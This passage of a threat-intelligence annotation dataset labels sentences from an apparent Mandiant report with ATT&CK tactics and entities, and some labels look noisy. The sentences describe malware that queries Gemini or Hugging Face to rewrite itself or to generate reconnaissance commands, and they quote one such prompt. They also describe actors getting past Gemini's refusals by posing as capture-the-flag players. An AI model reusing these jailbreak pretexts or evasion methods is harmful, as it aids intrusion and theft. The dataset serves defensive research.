"Obfuscated Files or Information" } ], "procedure": "Threat actors are experimenting with AI-based techniques expected to be integrated into future attack stages", "entities": [ { "text": "are evolving and how they can potentially integrate AI capabilities into future intrusion activity", "start": 125, "end": 223, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s16-e507b7", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "Although some recent implementations of novel AI techniques are experimental, they provide an early indicator of how threats are evolving and how they can potentially integrate AI capabilities into future intrusion activity.", "sentence_text": "Attackers are moving beyond \"vibe coding\" and the baseline observed in 2024 of using AI tools for technical support.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Threat actors are advancing past basic AI-assisted programming toward more capable AI involvement in intrusion operations", "entities": [ { "text": "Attackers", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "are moving beyond", "start": 10, "end": 27, "label": "Action" }, { "text": " AI tools for technical support", "start": 84, "end": 115, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s17-b44a55", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "Attackers are moving beyond \"vibe coding\" and the baseline observed in 2024 of using AI tools for technical support.", "sentence_text": "We are only now starting to see this type of activity, but expect it to increase in the future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s18-5a70e7", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "We are only now starting to see this type of activity, but expect it to increase in the future.", "sentence_text": "Experimental Malware Using Gemini for Self-Modification to Evade Detection In early June 2025, GTIG identified experimental dropper malware tracked as PROMPTFLUX that suggests threat actors are experimenting with LLMs to develop dynamic obfuscation techniques.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "PROMPTFLUX malware uses Gemini/LLMs to dynamically change its behavior and evade detection", "entities": [ { "text": "threat actors", "start": 176, "end": 189, "label": "ThreatActor" }, { "text": " are experimenting with LLMs to develop dynamic obfuscation techniques", "start": 189, "end": 259, "label": "Action" }, { "text": "PROMPTFLUX ", "start": 151, "end": 162, "label": "MalwareTool" }, { "text": "Gemini", "start": 27, "end": 33, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s19-08fe64", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "Experimental Malware Using Gemini for Self-Modification to Evade Detection In early June 2025, GTIG identified experimental dropper malware tracked as PROMPTFLUX that suggests threat actors are experimenting with LLMs to develop dynamic obfuscation techniques.", "sentence_text": "PROMPTFLUX is written in VBScript and interacts with Gemini's API to request specific VBScript obfuscation and evasion techniques to facilitate \"just-in-time\" self-modification, likely to evade static signature-based detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "PROMPTFLUX uses Gemini API calls to obtain tailored VBScript obfuscation for self-modifying behavior to evade detection", "entities": [ { "text": "PROMPTFLUX", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "is written in", "start": 11, "end": 24, "label": "Action" }, { "text": "interacts with", "start": 38, "end": 52, "label": "Action" }, { "text": "to request specific VBScript obfuscation and evasion techniques to facilitate", "start": 66, "end": 143, "label": "Action" }, { "text": "to evade static signature-based detection.", "start": 185, "end": 227, "label": "Action" }, { "text": "Gemini's API", "start": 53, "end": 65, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s20-6b037a", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "PROMPTFLUX is written in VBScript and interacts with Gemini's API to request specific VBScript obfuscation and evasion techniques to facilitate \"just-in-time\" self-modification, likely to evade static signature-based detection.", "sentence_text": "Further examination of PROMPTFLUX samples suggests this code family is currently in a development or testing phase since some incomplete features are commented out and a mechanism exists to limit the malware's Gemini API calls.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "PROMPTFLUX limits outbound Gemini API interactions and includes incomplete/hidden features while in development to reduce exposure and detection risk", "entities": [ { "text": " PROMPTFLUX", "start": 22, "end": 33, "label": "MalwareTool" }, { "text": " Gemini API", "start": 209, "end": 220, "label": "Infrastructure_Indicator" }, { "text": "to limit", "start": 187, "end": 195, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s21-313032", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "Further examination of PROMPTFLUX samples suggests this code family is currently in a development or testing phase since some incomplete features are commented out and a mechanism exists to limit the malware's Gemini API calls.", "sentence_text": "The current state of this malware does not demonstrate an ability to compromise a victim network or device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s22-2528fb", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "The current state of this malware does not demonstrate an ability to compromise a victim network or device.", "sentence_text": "We have taken action to disable the assets associated with this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s23-636579", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "We have taken action to disable the assets associated with this activity.", "sentence_text": "The most novel component of PROMPTFLUX is its \"Thinking Robot\" module, designed to periodically query Gemini to obtain new code for evading antivirus software.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "PROMPTFLUX’s “Thinking Robot” module queries Gemini to generate updated code to avoid antivirus detection", "entities": [ { "text": "PROMPTFLUX", "start": 28, "end": 38, "label": "MalwareTool" }, { "text": "designed to periodically query Gemini to obtain new code for evading antivirus software.", "start": 71, "end": 159, "label": "Action" }, { "text": "Gemini ", "start": 102, "end": 109, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s24-dada65", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "The most novel component of PROMPTFLUX is its \"Thinking Robot\" module, designed to periodically query Gemini to obtain new code for evading antivirus software.", "sentence_text": "This is accomplished using a hard-coded API key to send a POST request to the Gemini API endpoint.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Malware uses a hard-coded API key to issue POST requests to Gemini’s API endpoint to retrieve updated malicious code", "entities": [ { "text": "to send a POST request to", "start": 48, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "Gemini API endpoint.", "start": 78, "end": 98, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s25-73dd58", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "This is accomplished using a hard-coded API key to send a POST request to the Gemini API endpoint.", "sentence_text": "The actor specifies the use of the \" gemini-1.5-flash-latest \" model; the \" -latest \" tag ensures the malware always calls the most current stable release, making the tool more resilient to model deprecation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Malware instructs Gemini API to always call the latest model version to ensure continued evasion effectiveness over time", "entities": [ { "text": "The actor", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "specifies the use of the \" gemini-1.5-flash-latest \" model; the \" -latest \" tag ensures the malware always calls", "start": 10, "end": 122, "label": "Action" }, { "text": "making the tool more resilient to model deprecation.", "start": 156, "end": 208, "label": "Action" }, { "text": "gemini-1.5-flash-latest \" model", "start": 37, "end": 68, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s26-80ace1", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "The actor specifies the use of the \" gemini-1.5-flash-latest \" model; the \" -latest \" tag ensures the malware always calls the most current stable release, making the tool more resilient to model deprecation.", "sentence_text": "The prompt sent to the LLM is highly specific and machine-parsable, requesting VBScript code for antivirus evasion and instructing the LLM to output only the code itself.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Malware sends machine-parsable prompts to an LLM requesting antivirus-evasion VBScript and only the code output", "entities": [ { "text": "requesting VBScript code for antivirus evasion and instructing the LLM to output only the code itself.", "start": 68, "end": 170, "label": "Action" }, { "text": "prompt ", "start": 4, "end": 11, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s27-aa5d9d", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "The prompt sent to the LLM is highly specific and machine-parsable, requesting VBScript code for antivirus evasion and instructing the LLM to output only the code itself.", "sentence_text": "We identified multiple variations of PROMPTFLUX using LLM-driven code regeneration, including one with the \"Thinking Robot\" function replaced with a new \"Thinging\" function.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "PROMPTFLUX variants regenerate VBScript code through LLM queries, replacing modules like “Thinking Robot” with new variants (“Thinging”) to avoid detection", "entities": [ { "text": "PROMPTFLUX", "start": 37, "end": 47, "label": "MalwareTool" }, { "text": "Thinking Robot", "start": 108, "end": 122, "label": "MalwareTool" }, { "text": "Thinging", "start": 154, "end": 162, "label": "MalwareTool" }, { "text": "replaced with", "start": 133, "end": 146, "label": "Action" }, { "text": "LLM", "start": 54, "end": 57, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s28-37200c", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "We identified multiple variations of PROMPTFLUX using LLM-driven code regeneration, including one with the \"Thinking Robot\" function replaced with a new \"Thinging\" function.", "sentence_text": "This function leverages a prompt to instruct the Gemini API to rewrite the malware's entire source code on an hourly basis to evade detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Malware requests Gemini to rewrite its own source hourly, producing new variants to avoid signature-based detection", "entities": [ { "text": "to instruct", "start": 33, "end": 44, "label": "Action" }, { "text": "Gemini API", "start": 49, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "to rewrite the malware's entire source code on an hourly basis to evade detection", "start": 60, "end": 141, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s29-7a3038", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "This function leverages a prompt to instruct the Gemini API to rewrite the malware's entire source code on an hourly basis to evade detection.", "sentence_text": "Although unattributed to a specific threat actor, the filenames associated with PROMPTFLUX highlight behaviors commonly associated with financially motivated actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s30-e26038", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "Although unattributed to a specific threat actor, the filenames associated with PROMPTFLUX highlight behaviors commonly associated with financially motivated actors.", "sentence_text": "While PROMPTFLUX is likely still in research and development phases, this type of obfuscation technique is an early and significant indicator of how malicious operators will likely augment their campaigns with AI moving forward.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "PROMPTFLUX’s AI-supported code obfuscation suggests attackers will increasingly integrate AI for detection evasion in future campaigns", "entities": [ { "text": "malicious operators ", "start": 149, "end": 169, "label": "ThreatActor" }, { "text": " PROMPTFLUX", "start": 5, "end": 16, "label": "MalwareTool" }, { "text": "augment their campaigns with AI moving forward", "start": 181, "end": 227, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s31-83541d", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "While PROMPTFLUX is likely still in research and development phases, this type of obfuscation technique is an early and significant indicator of how malicious operators will likely augment their campaigns with AI moving forward.", "sentence_text": "LLM Generating Commands to Steal Documents and System Information In June, GTIG identified the Russian government-backed actor APT28 (aka FROZENLAKE) using new malware against Ukraine we track as PROMPTSTEAL and reported by CERT-UA as LAMEHUG .", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "APT28 deploys PROMPTSTEAL/LAMEHUG malware against Ukrainian systems to steal documents and system information via LLM-driven commands", "entities": [ { "text": "APT28 (aka FROZENLAKE)", "start": 127, "end": 149, "label": "ThreatActor" }, { "text": "Ukraine ", "start": 176, "end": 184, "label": "Action" }, { "text": "to Steal Documents and System Information", "start": 24, "end": 65, "label": "Action" }, { "text": " using new malware against", "start": 149, "end": 175, "label": "Action" }, { "text": " LAMEHUG", "start": 234, "end": 242, "label": "MalwareTool" }, { "text": "PROMPTSTEAL", "start": 196, "end": 207, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s32-855062", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "LLM Generating Commands to Steal Documents and System Information In June, GTIG identified the Russian government-backed actor APT28 (aka FROZENLAKE) using new malware against Ukraine we track as PROMPTSTEAL and reported by CERT-UA as LAMEHUG .", "sentence_text": "APT28's use of PROMPTSTEAL constitutes our first observation of malware querying an LLM deployed in live operations.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "PROMPTSTEAL malware queries an LLM in real-time during live intrusions to obtain operational code or instructions", "entities": [ { "text": "APT28", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": "PROMPTSTEAL", "start": 15, "end": 26, "label": "MalwareTool" }, { "text": "querying an LLM deployed in live operations", "start": 72, "end": 115, "label": "Action" }, { "text": "LLM", "start": 84, "end": 87, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s33-5656cb", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "APT28's use of PROMPTSTEAL constitutes our first observation of malware querying an LLM deployed in live operations.", "sentence_text": "PROMPTSTEAL novelly uses LLMs to generate commands for the malware to execute rather than hard coding the commands directly in the malware itself.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "PROMPTSTEAL retrieves commands from an LLM instead of embedding them in code, enabling flexible and adaptive execution", "entities": [ { "text": "PROMPTSTEAL", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "to generate commands for the malware to execute", "start": 30, "end": 77, "label": "Action" }, { "text": " LLMs", "start": 24, "end": 29, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s34-f66e57", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "PROMPTSTEAL novelly uses LLMs to generate commands for the malware to execute rather than hard coding the commands directly in the malware itself.", "sentence_text": "It masquerades as an \"image generation\" program that guides the user through a series of prompts to generate images while querying the Hugging Face API to generate commands for execution in the background.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Malware pretends to be an image generator to deceive users while secretly fetching executable commands from Hugging Face API", "entities": [ { "text": "guides the user through a series of prompts to generate images while querying the Hugging Face API to generate commands for execution in the background.", "start": 53, "end": 205, "label": "Action" }, { "text": "Hugging Face API", "start": 135, "end": 151, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s35-17f394", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "It masquerades as an \"image generation\" program that guides the user through a series of prompts to generate images while querying the Hugging Face API to generate commands for execution in the background.", "sentence_text": "Make a list of commands to create folder C:\\Programdata\\info and to gather computer information, hardware information, process and services information, networks information, AD domain information, to execute in one line and add each result to text file c:\\Programdata\\info\\info.txt.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Malware prepares a set of reconnaissance commands to collect computer, hardware, processes, services, network, and AD domain info and stores results in a single hidden folder for exfiltration", "entities": [ { "text": "to create folder", "start": 24, "end": 40, "label": "Action" }, { "text": "to gather computer information, hardware information, process and services information, networks information, AD domain information, to execute in one line and add each result to text file", "start": 65, "end": 253, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s36-6af330", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "Make a list of commands to create folder C:\\Programdata\\info and to gather computer information, hardware information, process and services information, networks information, AD domain information, to execute in one line and add each result to text file c:\\Programdata\\info\\info.txt.", "sentence_text": "Return only command, without markdown.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s37-ebbf49", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "Return only command, without markdown.", "sentence_text": "PROMPTSTEAL likely uses stolen API tokens to query the Hugging Face API.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1550", "name": "Use Alternate Authentication Material" } ], "procedure": "Uses stolen API tokens to query Hugging Face API", "entities": [ { "text": "PROMPTSTEAL", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "Hugging Face API", "start": 55, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "uses stolen API tokens", "start": 19, "end": 41, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s38-6160c9", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "PROMPTSTEAL likely uses stolen API tokens to query the Hugging Face API.", "sentence_text": "The prompt specifically asks the LLM to output commands to generate system information and also to copy documents to a specified directory.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Generating system information and copying documents to attacker-specified directory", "entities": [ { "text": "to output commands to generate system information", "start": 37, "end": 86, "label": "Action" }, { "text": "to copy documents to a specified directory", "start": 96, "end": 138, "label": "Action" }, { "text": "LLM", "start": 33, "end": 36, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s39-0ddc0b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "The prompt specifically asks the LLM to output commands to generate system information and also to copy documents to a specified directory.", "sentence_text": "The output from these commands are then blindly executed locally by PROMPTSTEAL before the output is exfiltrated.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Blind execution of commands and exfiltration of results", "entities": [ { "text": "PROMPTSTEAL", "start": 68, "end": 79, "label": "MalwareTool" }, { "text": "is exfiltrated", "start": 98, "end": 112, "label": "Action" }, { "text": " blindly executed locally by", "start": 39, "end": 67, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s40-c63743", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "The output from these commands are then blindly executed locally by PROMPTSTEAL before the output is exfiltrated.", "sentence_text": "Our analysis indicates continued development of this malware, with new samples adding obfuscation and changing the C2 method.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "New versions add obfuscation and alter command-and-control method", "entities": [ { "text": " adding obfuscation and changing the C2 method", "start": 78, "end": 124, "label": "Action" }, { "text": "C2 method", "start": 115, "end": 124, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s41-0fc384", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "Our analysis indicates continued development of this malware, with new samples adding obfuscation and changing the C2 method.", "sentence_text": "Social Engineering to Bypass Safeguards Guided by our AI Principles , Google designs AI systems with robust security measures and strong safety guardrails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s42-fd092a", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "Social Engineering to Bypass Safeguards Guided by our AI Principles , Google designs AI systems with robust security measures and strong safety guardrails.", "sentence_text": "Threat actors are adopting social engineering-like pretexts in their prompts to bypass AI safety guardrails.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Using deceptive prompt pretexts to bypass AI safety guardrails", "entities": [ { "text": "Threat actors", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "are adopting social engineering", "start": 14, "end": 45, "label": "Action" }, { "text": " to bypass AI safety guardrails", "start": 76, "end": 107, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s43-106a90", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "Threat actors are adopting social engineering-like pretexts in their prompts to bypass AI safety guardrails.", "sentence_text": "We observed actors posing as participants in a \"capture-the-flag\" competition for cybersecurity researchers to persuade Gemini to provide information that would otherwise be blocked, enabling vulnerability exploitation and tool development.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Pretending to be legitimate competition participants to obtain blocked security info", "entities": [ { "text": " actors", "start": 11, "end": 18, "label": "ThreatActor" }, { "text": "posing as participants in", "start": 19, "end": 44, "label": "Action" }, { "text": " Gemini", "start": 119, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "be blocked, enabling vulnerability exploitation and tool development", "start": 171, "end": 239, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s44-0ba392", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "We observed actors posing as participants in a \"capture-the-flag\" competition for cybersecurity researchers to persuade Gemini to provide information that would otherwise be blocked, enabling vulnerability exploitation and tool development.", "sentence_text": "In addition to disrupting these actors, we use these insights to continuously improve our classifiers and strengthen the security of our products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s45-343dce", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "In addition to disrupting these actors, we use these insights to continuously improve our classifiers and strengthen the security of our products.", "sentence_text": "Capture-the-Flag: Identifying as a CTF Player to Enable Research for Mass Exploitation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s46-5bd095", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "Capture-the-Flag: Identifying as a CTF Player to Enable Research for Mass Exploitation", "sentence_text": "A China-nexus threat actor misused Gemini to enhance the effectiveness of their campaigns by crafting lure content, building technical infrastructure, and developing tooling for data exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "Using Gemini to craft lures, build infrastructure, and develop exfiltration tooling", "entities": [ { "text": "China-nexus threat actor", "start": 2, "end": 26, "label": "ThreatActor" }, { "text": " misused", "start": 26, "end": 34, "label": "Action" }, { "text": "Gemini", "start": 35, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "crafting lure content, building technical infrastructure, and developing tooling for data exfiltration.", "start": 93, "end": 196, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s47-c1c098", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "A China-nexus threat actor misused Gemini to enhance the effectiveness of their campaigns by crafting lure content, building technical infrastructure, and developing tooling for data exfiltration.", "sentence_text": "In one interaction, the actor asked Gemini to identify vulnerabilities on a compromised system, but received a safety response from Gemini that a detailed response would not be safe.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1592", "name": "Gather Victim Host Information" } ], "procedure": "Uses Gemini to identify vulnerabilities but gemini refuses due to safety controls", "entities": [ { "text": "compromised system", "start": 76, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "asked Gemini to identify vulnerabilities", "start": 30, "end": 70, "label": "Action" }, { "text": "Gemini", "start": 36, "end": 42, "label": "MalwareTool" }, { "text": "Gemini ", "start": 132, "end": 139, "label": "MalwareTool" }, { "text": "the actor", "start": 20, "end": 29, "label": "ThreatActor" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s48-ed0ed7", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "In one interaction, the actor asked Gemini to identify vulnerabilities on a compromised system, but received a safety response from Gemini that a detailed response would not be safe.", "sentence_text": "When prompted to help in a CTF exercise, Gemini returned helpful information that could be misused to exploit the system.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1590", "name": "Gather Victim Network Information" } ], "procedure": "Gemini provided information that could be misused to exploit the system", "entities": [ { "text": "returned helpful information that could be misused to exploit the system", "start": 48, "end": 120, "label": "Action" }, { "text": "CTF exercise", "start": 27, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "Gemini", "start": 41, "end": 47, "label": "MalwareTool" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s49-65419b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "When prompted to help in a CTF exercise, Gemini returned helpful information that could be misused to exploit the system.", "sentence_text": "The actor appeared to learn from this interaction and used the CTF pretext in support of phishing, exploitation, and web shell development.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1203", "name": "Exploitation for Client Execution" }, { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Used CTF pretext in support of phishing, exploitation and web shell development", "entities": [ { "text": "phishing, exploitation, and web shell development", "start": 89, "end": 138, "label": "Action" }, { "text": "The actor", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": " appeared ", "start": 9, "end": 19, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s50-e76077", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "The actor appeared to learn from this interaction and used the CTF pretext in support of phishing, exploitation, and web shell development.", "sentence_text": "The actor prefaced many of their prompts about exploitation of specific software and email services with comments such as \"I am working on a CTF problem\" or \"I am currently in a CTF, and I saw someone from another team say …\" This approach provided advice on the next exploitation steps in a \"CTF scenario.\"", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1589", "name": "Gather Victim Identity Information" } ], "procedure": "The actor pretended to be in a CTF competition to get exploitation advice for software and email services.", "entities": [ { "text": " provided advice on the next exploitation", "start": 239, "end": 280, "label": "Action" }, { "text": "prefaced many of their prompts", "start": 10, "end": 40, "label": "Action" }, { "text": "The actor", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": " exploitation", "start": 46, "end": 59, "label": "Action" }, { "text": "software and email services", "start": 72, "end": 99, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s51-5716e5", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "The actor prefaced many of their prompts about exploitation of specific software and email services with comments such as \"I am working on a CTF problem\" or \"I am currently in a CTF, and I saw someone from another team say …\" This approach provided advice on the next exploitation steps in a \"CTF scenario.\"", "sentence_text": "Student Error: Developing Custom Tools Exposes Core Attacker Infrastructure", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s52-c0ea8d", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "Student Error: Developing Custom Tools Exposes Core Attacker Infrastructure", "sentence_text": "The Iranian state-sponsored threat actor TEMP.Zagros (aka MUDDYCOAST, Muddy Water)\nused Gemini to conduct research to support the development of custom malware, an evolution in the group’s capability.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "The Iranian actor TEMP.Zagros used the AI tool Gemini to research how to build better custom malware", "entities": [ { "text": " custom malware", "start": 144, "end": 159, "label": "MalwareTool" }, { "text": "conduct research to support the development of custom malware", "start": 98, "end": 159, "label": "Action" }, { "text": "Iranian state-sponsored threat actor TEMP.Zagros", "start": 4, "end": 52, 